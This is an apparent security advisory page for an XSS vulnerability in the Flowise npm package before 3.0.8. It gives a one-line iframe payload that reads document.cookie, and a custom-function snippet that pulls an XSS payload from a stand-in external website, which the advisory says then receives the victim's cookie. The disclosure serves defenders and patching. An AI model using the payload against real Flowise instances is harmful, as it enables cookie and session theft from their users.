Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-4fr9-3x69-36wv

Опубликовано: 03 окт. 2025
Источник: github
Github: Прошло ревью
CVSS4: 6.3

Описание

Flowise vulnerable to XSS

Summary

A XSS(cross-site scripting) vulnerability is caused by insufficient filtering of input by web applications. Attackers can leverage this XSS vulnerability to inject malicious script code (HTML code or client-side Javascript code) into web pages, and when users browse these web pages, the malicious code will be executed, and the victims may be vulnerable to various attacks such as cookie data theft, etc.

Details

  1. Send a Message <iframe src="javascript:alert(document.cookie);"> from User in a chat box: image
Trigger in other ways:

  1. Create a Agentflow in cloud platform (https://cloud.flowiseai.com/agentflows)

  2. Create a Custom function as an example, use the below example code.

const fetch = require('node-fetch'); const url = 'https://external.website'; const options = { method: 'GET', headers: { 'Content-Type': 'application/json' } }; try { const response = await fetch(url, options); const text = await response.text(); return text; } catch (error) { console.error(error); return ''; }

  1. The external website (https://external.website) return a XSS payload as content.

    image

  2. The javascript code is executed and the victim's cookie data is sent to the external website.

    image

PoC

<iframe src="javascript:alert(document.cookie);">

Impact

it is critical XSS vulnerability. All users of Flowise platform that use the workflows of agents.

Ссылки

Пакеты

Наименование

flowise

npm
Затронутые версииВерсия исправления

< 3.0.8

3.0.8

6.3 Medium

CVSS4

Дефекты

CWE-79

6.3 Medium

CVSS4

Дефекты

CWE-79